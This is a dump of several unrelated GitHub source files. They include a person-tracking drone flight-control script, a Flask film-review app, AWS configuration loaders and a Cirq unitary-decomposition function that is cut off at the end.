interpreter.Interpreter(model_path=model_path,num_threads=4)\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n input_tensor_index = self.input_details[0]['index']\n\n self.mean = 127.5\n self.std = 127.5\n\n self.frame = []\n while len(self.frame) == 0:\n self.frame = stream.read()\n\n self.imgW_resize = 300 #frame.shape[1]\n self.imgH_resize = 300 #frame.shape[0]\n\n # config = np.array([1,self.imgH_resize,self.imgW_resize,3],dtype=np.int32)\n # model.resize_tensor_input(input_tensor_index, config)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.confidence_thresh = 0.52\n self.boxes_id, self.classes_id, self.scores_id = 0, 1, 2\n\n self.stopped = False\n\n self.label = ''\n with open(labels,'r') as f:\n self.label = f.read()\n\n self.label = self.label.split('\\n')\n if self.label[0] == '???':\n del(self.label[0])\n def getInstance(self):\n return self\n def start(self,poly=None):\n self.stopped = False\n print(\" Started tracking .........\")\n self.ct = CentroidTracker()\n Thread(target=self.detect,args=(poly,)).start()\n\n def isIn(self,rects,points,cd = False):\n \n for i,(xmin,ymin,xmax,ymax) in enumerate(rects):\n flag = False\n for x,y in points:\n if x < xmin or x > xmax or y < ymin or y > ymax:\n flag = True\n break\n if not flag:\n if cd:\n dist = math.dist(((xmin+xmax)/2,(ymin+ymax)/2),points[0])\n print('distance -> ',dist)\n if dist < 30:\n return i\n continue\n return i\n return -1\n def detect(self,poly=None):\n global is_tracking,bbox_coordinates\n self.poly = poly\n locked_on = False\n if self.poly == None:\n is_tracking = False\n triggerDetection()\n\n global frames\n id = -1\n while not self.stopped:\n self.frame = self.stream.read()\n frame_inp = self.frame.copy()\n frame_inp = cv.resize(frame_inp,(self.imgW_resize,self.imgH_resize),cv.INTER_AREA)\n if self.input_details[0]['dtype'] == np.float32:\n frame_inp = (frame_inp - self.mean)/self.std\n frame_inp = np.expand_dims(frame_inp,axis=0)\n \n self.model.set_tensor(self.input_details[0]['index'],frame_inp)\n self.model.invoke()\n\n boxes = self.model.get_tensor(self.output_details[self.boxes_id]['index'])[0]\n classes = self.model.get_tensor(self.output_details[self.classes_id]['index'])[0]\n scores = self.model.get_tensor(self.output_details[self.scores_id]['index'])[0]\n\n scores_sorted = list(reversed(np.argsort(scores,axis=0)))\n \n\n d_rects = []\n # print(scores_sorted)\n for i in scores_sorted[:4]:\n # print('detected -> ',classes[i])\n if (scores[i] < self.confidence_thresh or scores[i] > 1.0) or int(classes[i]) != 0:\n continue\n ymin = int(max(1,imgH*boxes[i][0]))\n xmin = int(max(1,imgW*boxes[i][1]))\n ymax = int(min(imgH,imgH*boxes[i][2]))\n xmax = int(min(imgW,imgW*boxes[i][3]))\n if id == -1:\n cv.rectangle(self.frame,(xmin,ymin),(xmax,ymax),(255,0,0),3)\n d_rects.append([xmin,ymin,xmax,ymax])\n\n if id == -1:\n id = self.isIn(d_rects,self.poly)\n if id == -1 and not is_tracking:\n is_tracking = False\n triggerDetection()\n\n objects = self.ct.update(rects=d_rects)\n \n # if locked_on and id not in list(objects.keys()):\n # is_tracking = False\n # triggerDetection()\n #print('id -> ',id,' poly -> ',self.poly,' rects -> ',d_rects)\n if not locked_on and id != -1:\n id = int(list(objects.keys())[id])\n locked_on = True\n \n else:\n try:\n centroid = objects[id]\n text = \"Tracking tis idiot {}\".format(id)\n cv.putText(self.frame, text, (centroid[0] - 10, centroid[1] - 10),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv.circle(self.frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n except:\n is_tracking = False\n triggerDetection()\n \n if locked_on:\n rect_id = self.isIn(d_rects,list([objects[id]]),cd=True)\n if(rect_id != -1):\n cv.rectangle(self.frame,d_rects[rect_id][:2],d_rects[rect_id][-2:],(255,0,0),3)\n bbox_coordinates = (d_rects[rect_id][:2],d_rects[rect_id][-2:])\n # if not self.is_tracking:\n # pass #TODO\n\n frames['detection'] = self.frame\n\n def stop(self):\n self.stopped = True\n\nclass PoseDetection: # 0 - jesus pose\n def __init__(self,stream):\n global imgW,imgH,is_tracking\n self.stream = stream\n \n model_path = 'pose.tflite'\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=2)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.input_index = self.input_details[0]['index']\n self.output_index = self.output_details[0]['index']\n\n self.stopped = False\n\n self.imgH_resize,self.imgW_resize = self.input_details[0]['shape_signature'][1:3]\n print(self.imgH_resize,self.imgW_resize)\n print('\\n')\n print(imgW,imgH)\n # print(self.input_details)\n # print('\\n')\n # print(self.output_details)\n def getInstance(self):\n return self\n\n def start(self):\n self.stopped = False\n print(\" Started detecting pose .........\")\n Thread(target=self.getPose,args=()).start()\n\n def getRect(self):\n return self.rect\n\n def getPose(self):\n global frames,is_tracking,imgW,imgH\n hw = [imgH,imgW]\n while not self.stopped:\n frame = self.stream.read()\n frame_inp = cv.resize(frame,(self.imgH_resize,self.imgW_resize),interpolation=cv.INTER_AREA)\n frame_inp = np.array(np.expand_dims(frame_inp,axis=0),dtype=np.float32)\n\n self.model.set_tensor(self.input_index,frame_inp)\n self.model.invoke()\n\n keypoints = self.model.get_tensor(self.output_index)[0][0]\n for i, keypoint in enumerate(keypoints):\n keypoints[i][:2] = np.multiply(keypoint[:2],hw)\n # print('keypoints -> ',keypoints[i][:2])\n # print(keypoints)\n self.rect = self.estimatePose(keypoints)\n if(self.rect != None):\n # print('detected ')\n is_tracking = True\n triggerDetection()\n\n for keypoint in keypoints:\n if keypoint[2] < 0.3:\n continue\n cv.circle(frame,(int(keypoint[1]),int(keypoint[0])),4,(255,0,0),-1)\n frames['detection'] = frame\n\n \n def estimatePose(self,keypoints):\n points = np.arange(5,11)\n for point in points:\n if keypoints[point][2] < 0.4:\n return None\n dist_wrists = math.dist(keypoints[9][:2], keypoints[10][:2])\n dist_sum = math.dist(keypoints[5][:2],keypoints[6][:2])\n for i in range(2):\n dist_sum += math.dist(keypoints[5+i*2][:2],keypoints[5+(i+1)*2][:2])\n dist_sum += math.dist(keypoints[6+i*2][:2],keypoints[6+(i+1)*2][:2])\n if abs(dist_sum - dist_wrists) < dist_sum/7:\n return [keypoints[5][:2],keypoints[6][:2],keypoints[11][:2],keypoints[12][:2]]\n return None\n \n def stop(self):\n self.stopped=True\n\nclass PID:\n def __init__(self):\n global imgW, imgH,prev_box_mid\n self.kp = 0.5\n self.kd = 0.3\n self.ki = 0.001\n self.center = prev_box_mid = [imgW//2,imgH//2]\n self. total_area = imgW*imgH\n self.prev_time = time.time()\n\n def calcPID(self):\n global bbox_coordinates,prev_box_mid,curr_mid, prev_area\n curr_area = abs(bbox_coordinates[0][0] - bbox_coordinates[1][0])*abs(bbox_coordinates[0][1] - bbox_coordinates[1][1])\n curr_mid = ((bbox_coordinates[0][0]+bbox_coordinates[1][0])/2,(bbox_coordinates[0][1]+bbox_coordinates[1][1])/2)\n\n # Pid correction -> rudder\n errorX = self.center[0] - curr_mid[0]\n dx = curr_mid[0] - prev_box_mid[0]\n dt = time.time() - self.prev_time\n\n pidPX = int(self.kp*errorX)\n pidDX = int(self.kd*dx/dt)\n pidIX = 0\n if abs(errorX) < 50:\n pidIX = int(self.ki*errorX)\n prev_box_mid = curr_mid\n pid_rudder = pidDX + pidDX + pidIX\n\n errorZ = self.total_area - curr_area\n dz = curr_area - prev_area\n pidPZ = int(errorZ/1000)\n pidDZ = int(self.kd*dz/dt)\n pid_alieron = pidPZ + pidDZ\n\n self.prev_time = time.time()\n if curr_area > 0.4*self.total_area:\n pid_alieron = 0\n\n return pid_rudder,pid_alieron\n \n\ndef triggerDetection():\n global detect,pdetect,is_tracking,switch_state\n if is_tracking:\n poly = pdetect.getRect()\n pdetect.stop()\n detect.start(poly) \n switch_state = 1\n else:\n detect.stop()\n pdetect.start()\n switch_state=0\n\ndef read_from_arduino():\n global data,data_available\n try:\n data = bus.read_i2c_block_data(ADDR,0,30)\n data = [chr(s) for s in data]\n data = ''.join(data).split('#')\n data = data[1:-1]\n # print(data)\n data = [int(x) for x in data]\n data_available = True\n except:\n print('An error has occurred')\n data_available = False\n\ndef write_to_arduino(data):\n global switch_state\n data = data.copy()\n if len(data) > 2:\n data.append(switch_state)\n data_str = '#'.join(map(str,data))\n data = list(bytes(data_str,'utf-8'))\n print(data_str,data)\n try:\n bus.write_i2c_block_data(ADDR, 0, data)\n except:\n print('error')\n\ndef record_footage():\n global frames,stream\n output= cv.VideoWriter('footage',cv.VideoWriter_fourcc(*'XVID'),25,frames['detection'])\n \n while not stream.stopEx:\n output.write(frames['detection'])\n output.release()\n\n\ndef isr(channel): \n global pdetect,detect,data_available,is_tracking\n # print('#########################test############################') \n if GPIO.input(channel):\n ctr = 0\n while not data_available and ctr < 10:\n read_from_arduino()\n ctr+=1\n if data_available:\n triggerDetection()\n else:\n data_available=False\n pdetect.stop()\n detect.stop()\n is_tracking=False\n write_to_arduino([0])\n\n######################### without external mcu\n\n# def calcPWM(channel):\n# global pwm_vals,pwm_counts\n# if GPIO.input(channel):\n# started = time.time()\n# else:\n# pulse_width = time.time()-started\n# pwm_vals[channel] += pulse_width\n# pwm_counts[channel] += 1\n\n# def getPWM():\n# global pwm_in,pwm_counts\n# GPIO.add_event_detect(pwm,GPIO.BOTH,calcPWM)\n# sleep(3)\n# GPIO.remove_event_detect(pwm)\n# if 0 in pwm_counts.values():\n# return False\n# pwm_vals = {x:float(pwm_vals[x]/pwm_counts[x]) for x in list(pwm_vals.keys())}\n# print(pwm_vals)\n# return True\n#pins normally high -> 3,5,7,24,26\n#pins 13 and 15\n# switch_pin = 3\n# pwm_in = (10,11,12,13,15) #pins for reading pwm signals -> (aileron, rudder)\n# pwm_out = (5,7,24,26,16)\n# pwm_vals = {10:1000,11:1000,12:1000,13:1000,15:1000}\n# pwm_counts = {10:0,11:0,12:0,13:0,15:0}\n\n#########################\nADDR = 0x09\ninterrupt = 7\n\nimgW = imgH = 0\nis_tracking = False\nframes = dict({'detection' : np.ones(shape=(640,480,3),dtype=np.float32)})\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(interrupt,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\nGPIO.add_event_detect(interrupt,GPIO.BOTH,isr)\n\nbus = smbus2.SMBus(1)\n######################## without external mcu\n\n# GPIO.setup(pwm_in,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n# GPIO.setup(pwm_out,GPIO.OUT)\n# GPIO.output(pwm_out,GPIO.LOW)\n########################\n\ndata_available = False #input pwm values from arduino\ndata=[0] #format - option, rudder, elevator, aileron, gps select\nswitch_state = 0\n\nbbox_coordinates = [[0,0],[0,0]]\nprev_box_mid = (0,0)\nprev_area = imgH*imgW\n\nstream = VideoStream().getInstance()\nstream.update()\ntime.sleep(1)\npdetect = PoseDetection(stream=stream).getInstance()\ndetect = Detect(stream=stream).getInstance()\npid = PID()\n# print(detect,pdetect)\n\nprev_time = time.time()\n\n# Thread(target=record_footage,args=()).start() # uncomment for enabling video recording\nwhile True:\n stream.update()\n cv.imshow('detected',cv.cvtColor(frames['detection'],cv.COLOR_BGR2RGB))\n\n if(data_available):\n PidX,PidZ = pid.calcPID()\n PidX = -PidX\n # print(Pid)\n dup_data = data.copy()\n dup_data[1] += PidX\n # dup_data[3] += PidZ #Enable for aileron control\n # i2c_time = time.time()\n if(time.time() - prev_time > 0.50):\n write_to_arduino(dup_data)\n prev_time = time.time()\n # print('i2c time :',(time.time()-i2c_time)*1000)\n # print(is_tracking)\n if cv.waitKey(10) & 0xFF == 27 :\n stream.stop()\n pdetect.stop()\n detect.stop()\n break\nGPIO.cleanup()\ncv.destroyAllWindows()","repo_name":"kevinjacb/computer_vision_drone","sub_path":"fcCode.py","file_name":"fcCode.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4218743940","text":"\"\"\"Courseware constants\"\"\"\n\nPLATFORM_EDX = \"edx\"\n# List of all currently-supported openedx platforms\nOPENEDX_PLATFORMS = (PLATFORM_EDX,)\n# Currently-supported openedx platforms in a ChoiceField-friendly format\nOPENEDX_PLATFORM_CHOICES = zip(OPENEDX_PLATFORMS, OPENEDX_PLATFORMS)\nEDX_ENROLLMENT_VERIFIED_MODE = \"verified\"\nEDX_ENROLLMENT_AUDIT_MODE = \"audit\"\nEDX_DEFAULT_ENROLLMENT_MODE = EDX_ENROLLMENT_AUDIT_MODE\nEDX_ENROLLMENTS_PAID_MODES = [\n EDX_ENROLLMENT_VERIFIED_MODE,\n]\nPRO_ENROLL_MODE_ERROR_TEXTS = (\n \"The [{}] course mode is expired or otherwise unavailable for course run\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n \"Specified course mode '{}' unavailable for course\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n)\n# The amount of minutes after creation that a openedx model record should be eligible for repair\nOPENEDX_REPAIR_GRACE_PERIOD_MINS = 5\n","repo_name":"mitodl/mitxonline","sub_path":"openedx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"38825892415","text":"from application import app, db\nfrom application.models import Review, Film\nfrom flask import render_template, url_for\nfrom flask import redirect, request\nfrom application.forms import AddReview, AddFilm\n\n\n@app.route('/', methods=['GET','POST'])\n\n@app.route('/home', methods=['GET','POST'])\ndef home():\n all_reviews = Review.query.all()\n all_film = Film.query.all()\n print(all_reviews)\n return render_template('home.html', title=\"Home\", all_reviews=all_reviews, all_film=all_film)\n\n@app.route('/addfilm', methods=['GET', 'POST'])\ndef addfilm():\n form = AddFilm()\n if request.method == 'POST':\n if form.validate_on_submit():\n new_film = Film(\n title = form.title.data,\n description = form.description.data,\n released_at = form.released_at.data,\n age_rating = form.age_rating.data\n )\n\n db.session.add(new_film)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('addfilm.html', title=\"Add a Film\", form=form)\n\n\n@app.route('/addreview', methods=['GET','POST'])\ndef addreview():\n form = AddReview()\n form.film_title.choices = [(film.id, film.title) for film in Film.query.all()]\n if request.method == 'POST':\n if form.validate_on_submit():\n new_review = Review(\n film_id = form.film_title.data,\n author = form.author.data,\n review = form.review.data,\n rating = form.rating.data\n )\n\n db.session.add(new_review)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('add_review.html', title='Add a Review', form=form)\n\n@app.route(\"/update/\", methods=[\"GET\", \"POST\"])\ndef update(id):\n form = AddReview()\n form.film_title.choices = [(title.title) for title in Film.query.all()]\n review = Review.query.filter_by(id=id).first()\n if request.method == \"POST\":\n review.film_title = form.film_title.data\n review.author = form.author.data\n review.review = form.review.data\n review.rating = form.rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"update.html\", form=form, title=\"Update Review\", review=review)\n\n@app.route(\"/updatefilm/\", methods=[\"GET\", \"POST\"])\ndef updatefilm(id):\n form = AddFilm()\n film = Film.query.filter_by(id=id).first()\n if request.method == \"POST\":\n film.title = form.title.data\n film.decription = form.description.data\n film.released_at = form.released_at.data\n film.age_rating = form.age_rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"updatefilm.html\", form=form, title=\"Update Film\", film=film)\n\n@app.route('/deletereview/', methods=[\"GET\", \"POST\"])\ndef deletereview(id):\n reviewtodelete = Review.query.get(id)\n db.session.delete(reviewtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/deletefilm/', methods=[\"GET\", \"POST\"])\ndef deletefilm(id):\n filmtodelete = Film.query.get(id)\n db.session.delete(filmtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/filmlist', methods=['GET','POST'])\ndef filmlist():\n all_films = Film.query.all()\n print(all_films)\n return render_template(\"filmlist.html\", title=\"Film List\", all_films=all_films)\n\n@app.route('/count', methods=[\"GET\", \"POST\"])\ndef count():\n number_of_reviews = Review.query.count()\n print(number_of_reviews)\n db.session.commit()\n return render_template(\"count.html\", title=\"Count\", number_of_reviews=number_of_reviews)","repo_name":"sc18kg/first-qa-project","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26149845883","text":"import pandas as pd\nimport os\nfrom shutil import copyfile\n\nFePh_base_path = \"/Users/chbh01/Documents/OfflineCodebases/DFKI_Hiwi/ACG/EASIER/Datasets/FePh/\"\ny_df = pd.read_csv(os.path.join(FePh_base_path, \"FePh_labels.csv\"))\nimages_dir = os.path.join(FePh_base_path, \"FePh_images\")\n\ndestination_folder = \"FePh_images-single-labels-only\"\nos.makedirs(os.path.join(FePh_base_path, destination_folder))\ny_df.dropna(inplace=True)\n# Extracting multiple labels\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: [int(i) for i in x])\ny_df['num_labels'] = y_df['Facial_label'].apply(lambda x: len(x))\n# Removing all data points with more than one labels ==> Ambiguous\ny_df = y_df[y_df[\"num_labels\"] == 1]\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: x[0]).to_numpy()\nprint(y_df[\"External ID\"].values.shape)\n\nfor f in y_df[\"External ID\"]:\n try:\n copyfile(os.path.join(images_dir, f), os.path.join(FePh_base_path, destination_folder, f))\n except FileNotFoundError:\n copyfile(os.path.join(images_dir, f + \".png\"), os.path.join(FePh_base_path, destination_folder, f + \".png\"))\n\ny_df.to_csv(\"FePh_labels_single_label_only.csv\")\n","repo_name":"DFKI-SignLanguage/EASIER-EkmanClassifier","sub_path":"Scripts/gen_FePh_fullset_onlysinglelabels.py","file_name":"gen_FePh_fullset_onlysinglelabels.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8022296312","text":"from tkinter import TRUE\r\nimport operator\r\n\r\ndef sort_by_occurrence(nums):\r\n \"\"\"按照 list 物件 nums 里的各元素出现次数,进行递增排序\"\"\"\r\n # 把你的程式码放在这里\r\n a = {} \r\n for i in input_list:\r\n if input_list.count(i)>0:\r\n a[i]= input_list.count(i) #出现次数\r\n a = sorted(a.items(),key=operator.itemgetter(1)) #排序\r\n res = []\r\n for item in a:\r\n res.append(item[0])\r\n return res\r\n\r\nif __name__ == '__main__':\r\n # 只有当这个 py 档案以 Python 直译器执行时,才会执行到以下程式码。\r\n # 若是把这个 py 档案做为模组来汇入,不会执行到以下程式码。\r\n input_list = [7,7,7,8,1,1]\r\n output_list = sort_by_occurrence(input_list)\r\n print(output_list)\r\n\r\n\r\n#留言板","repo_name":"EEB113A/hw3-Code-Review","sub_path":"1070327_王云晨.py","file_name":"1070327_王云晨.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5641923378","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom swagger_server.models.cid import Cid # noqa: E501\nfrom swagger_server.models.componentsresponses_not_foundcontentapplication1problem2_bxmlschema import ComponentsresponsesNotFoundcontentapplication1problem2Bxmlschema # noqa: E501\nfrom swagger_server.models.create_cid_set_file_request import CreateCidSetFileRequest # noqa: E501\nfrom swagger_server.models.create_cid_set_file_response import CreateCidSetFileResponse # noqa: E501\nfrom swagger_server.models.create_sync_verification_request import CreateSyncVerificationRequest # noqa: E501\nfrom swagger_server.models.create_sync_verification_response import CreateSyncVerificationResponse # noqa: E501\nfrom swagger_server.models.get_cid_set_file_response import GetCidSetFileResponse # noqa: E501\nfrom swagger_server.models.get_entry_by_cid_response import GetEntryByCidResponse # noqa: E501\nfrom swagger_server.models.inline_response404 import InlineResponse404 # noqa: E501\nfrom swagger_server.models.key_type import KeyType # noqa: E501\nfrom swagger_server.models.list_cid_set_events_response import ListCidSetEventsResponse # noqa: E501\nfrom swagger_server.test import BaseTestCase\n\n\nclass TestReconciliationController(BaseTestCase):\n \"\"\"ReconciliationController integration test stubs\"\"\"\n\n def test_create_cid_set_file(self):\n \"\"\"Test case for create_cid_set_file\n\n Criar Arquivo de CIDs\n \"\"\"\n body = CreateCidSetFileRequest()\n response = self.client.open(\n '/api/v1-rc5//cids/files/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_create_sync_verification(self):\n \"\"\"Test case for create_sync_verification\n\n Verificar Sincronismo\n \"\"\"\n body = CreateSyncVerificationRequest()\n response = self.client.open(\n '/api/v1-rc5//sync-verifications/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_cid_set_file(self):\n \"\"\"Test case for get_cid_set_file\n\n Consultar Arquivo de CIDs\n \"\"\"\n headers = [('pi_requesting_participant', 'pi_requesting_participant_example')]\n response = self.client.open(\n '/api/v1-rc5//cids/files/{Id}'.format(id=56),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_entry_by_cid(self):\n \"\"\"Test case for get_entry_by_cid\n\n Consultar Vínculo por CID\n \"\"\"\n response = self.client.open(\n '/api/v1-rc5//cids/entries/{Cid}'.format(cid=Cid()),\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_list_cid_set_events(self):\n \"\"\"Test case for list_cid_set_events\n\n Listar Eventos de CIDs\n \"\"\"\n query_string = [('participant', 'participant_example'),\n ('key_type', KeyType()),\n ('start_time', '2013-10-20T19:20:30+01:00'),\n ('end_time', '2013-10-20T19:20:30+01:00'),\n ('limit', 56)]\n response = self.client.open(\n '/api/v1-rc5//cids/events',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n import unittest\n unittest.main()\n","repo_name":"legiti/pix-dict-api","sub_path":"flask/swagger_server/test/test_reconciliation_controller.py","file_name":"test_reconciliation_controller.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"10029945564","text":"import configparser\n\n\nclass AWSIdentity:\n def __init__(self, config_file_path):\n \"\"\"\n Get AWS KEY, SECRET, and TOKEN in config file\n :param config_file_path: Path lead to AWS credential config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.aws_identity = dict()\n\n self.__get_aws_identity()\n\n def __get_aws_identity(self):\n self.aws_identity['aws_key'] = self.config.get('AWS', 'KEY')\n self.aws_identity['aws_secret'] = self.config.get('AWS', 'SECRET')\n self.aws_identity['aws_token'] = self.config.get('AWS', 'TOKEN')\n\n\nclass AWSCluster:\n def __init__(self, config_file_path):\n \"\"\"\n Get all required info for AWS S3, Redshift Cluster, and Database in config file\n :param config_file_path: Path lead to AWS S3, Redshift Cluster, and Database config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.cluster_info = dict()\n\n self.__get_cluster_info()\n\n def __get_cluster_info(self):\n # Cluster configuration\n self.cluster_info['dwh_cluster_identifier'] = self.config.get(\"DWH\", \"CLUSTER_IDENTIFIER\")\n self.cluster_info['dwh_cluster_type'] = self.config.get(\"DWH\", \"CLUSTER_TYPE\")\n self.cluster_info['dwh_num_nodes'] = self.config.get(\"DWH\", \"NUM_NODES\")\n self.cluster_info['dwh_node_type'] = self.config.get(\"DWH\", \"NODE_TYPE\")\n\n # Database info\n self.cluster_info['dwh_db'] = self.config.get(\"CLUSTER\", \"DB_NAME\")\n self.cluster_info['dwh_db_user'] = self.config.get(\"CLUSTER\", \"DB_USER\")\n self.cluster_info['dwh_db_password'] = self.config.get(\"CLUSTER\", \"DB_PASSWORD\")\n self.cluster_info['dwh_port'] = self.config.get(\"CLUSTER\", \"DB_PORT\")\n self.cluster_info['dwh_host'] = self.config.get(\"CLUSTER\", \"HOST\")\n self.cluster_info['dwh_region'] = self.config.get(\"DWH\", \"REGION\")\n\n # S3 info\n self.cluster_info['s3_log_data'] = self.config.get('S3', 'log_data')\n self.cluster_info['s3_log_jsonpath'] = self.config.get('S3', 'log_jsonpath')\n self.cluster_info['s3_song_data'] = self.config.get('S3', 'song_data')\n\n # IAM role\n self.cluster_info['dwh_iam_role_name'] = self.config.get(\"DWH\", \"IAM_ROLE_NAME\")\n self.cluster_info['dwh_iam_arn'] = self.config.get(\"IAM_ROLE\", \"ARN\")\n\n","repo_name":"xzbits/project3_DE_ND","sub_path":"aws_identity_redshift_cluster_config.py","file_name":"aws_identity_redshift_cluster_config.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20837569319","text":"# Напишите программу, которая по заданному номеру четверти \n# показывает диапазон возможных координат точек в этой четверти (x и y).\n\n# print('Введите номер четверти')\n# n = int(input())\n# if n == 1:\n# print('x = (0; +∞) y = (0; +∞)')\n# elif n == 2:\n# print('x = (0; +∞) y = (-∞; 0)')\n# elif n == 3:\n# print('x = (-∞; 0) y = (-∞; 0)')\n# elif n == 4:\n# print('x = (-∞; 0) y = (0; +∞)')\n\nnumber = int(input()) # на строку ниже создаем словарь по ключу\nd = {1: 'x = (0; +∞) y = (0; +∞)', 2: 'x = (0; +∞) y = (-∞; 0)', 3: 'x = (-∞; 0) y = (-∞; 0)', 4: 'x = (-∞; 0) y = (0; +∞)'}\nprint(d[number])","repo_name":"IljaBoroznov/pithon_homework","sub_path":"Homework_1/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21908624978","text":"from typing import List, Tuple\n\nimport numpy as np\nimport cirq\nfrom cirq import optimizers\n\n\ndef matrix_to_sycamore_operations(\n target_qubits: List[cirq.GridQubit], matrix: np.ndarray\n) -> Tuple[cirq.OP_TREE, List[cirq.GridQubit]]:\n \"\"\"A method to convert a unitary matrix to a list of Sycamore operations.\n\n This method will return a list of `cirq.Operation`s using the qubits and (optionally) ancilla\n qubits to implement the unitary matrix `matrix` on the target qubits `qubits`.\n The operations are also supported by `cirq.google.gate_sets.SYC_GATESET`.\n\n Args:\n target_qubits: list of qubits the returned operations will act on. The qubit order defined by the list\n is assumed to be used by the operations to implement `matrix`.\n matrix: a matrix that is guaranteed to be unitary and of size (2**len(qs), 2**len(qs)).\n Returns:\n A tuple of operations and ancilla qubits allocated.\n Operations: In case the matrix is supported, a list of operations `ops` is returned.\n `ops` acts on `qs` qubits and for which `cirq.unitary(ops)` is equal to `matrix` up\n to certain tolerance. In case the matrix is not supported, it might return NotImplemented to\n reduce the noise in the judge output.\n Ancilla qubits: In case ancilla qubits are allocated a list of ancilla qubits. Otherwise\n an empty list.\n .\n \"\"\"\n num_of_qubits = len(target_qubits)\n\n if np.all(np.equal(matrix, np.eye(2 ** num_of_qubits))):\n # Simple Identity Check\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\n if num_of_qubits == 1:\n # single qubit gates\n gate = optimizers.single_qubit_matrix_to_phxz(matrix)\n cirq.google.Sycamore.validate_operation(gate(target_qubits[0]))\n return [gate(target_qubits[0])], []\n\n elif num_of_qubits == 2:\n # two qubit gates\n ops_list = optimizers.two_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], matrix,\n allow_partial_czs=True)\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n converted_ops_list = ConvertToSycamoreGates.convert(op=ops_list)\n return converted_ops_list, []\n\n elif is_incremental(matrix):\n ancilla = find_neighbor_available_qubit(target_qubits)\n return decompose_incrementer_matrix(target_qubits, ancilla), [ancilla]\n\n elif num_of_qubits == 3:\n # three qubit gates\n ops_list = optimizers.three_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], target_qubits[2],\n matrix)\n\n return ops_list, []\n\n elif np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:\n # diagonal gates with more than 3 qubits\n angle_list = []\n for i in np.arange(np.shape(matrix)[0]):\n angle_list.append(np.angle(matrix[i, i]))\n diagonal_gate = cirq.ops.DiagonalGate(angle_list)\n ops_list = diagonal_gate._decompose_(qubits=target_qubits)\n\n return ops_list, []\n\n elif num_of_qubits == 4:\n ancilla = find_neighbor_available_qubit(target_qubits)\n CTOFFLI_mat = cirq.unitary(\n cirq.ops.ControlledOperation(controls=[target_qubits[0], target_qubits[1], target_qubits[2]],\n sub_operation=cirq.X(target_qubits[3])))\n if np.all(np.equal(matrix, CTOFFLI_mat)):\n ops_list = []\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[target_qubits[2], target_qubits[1], target_qubits[0]], target=target_qubits[3],\n free_qubits=[ancilla])\n ops_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n return ops_list, [ancilla]\n\n\n else:\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\ndef is_incremental(mat):\n mat_new = np.zeros([np.shape(mat)[0], np.shape(mat)[1]])\n mat_new[0:-1, :] = 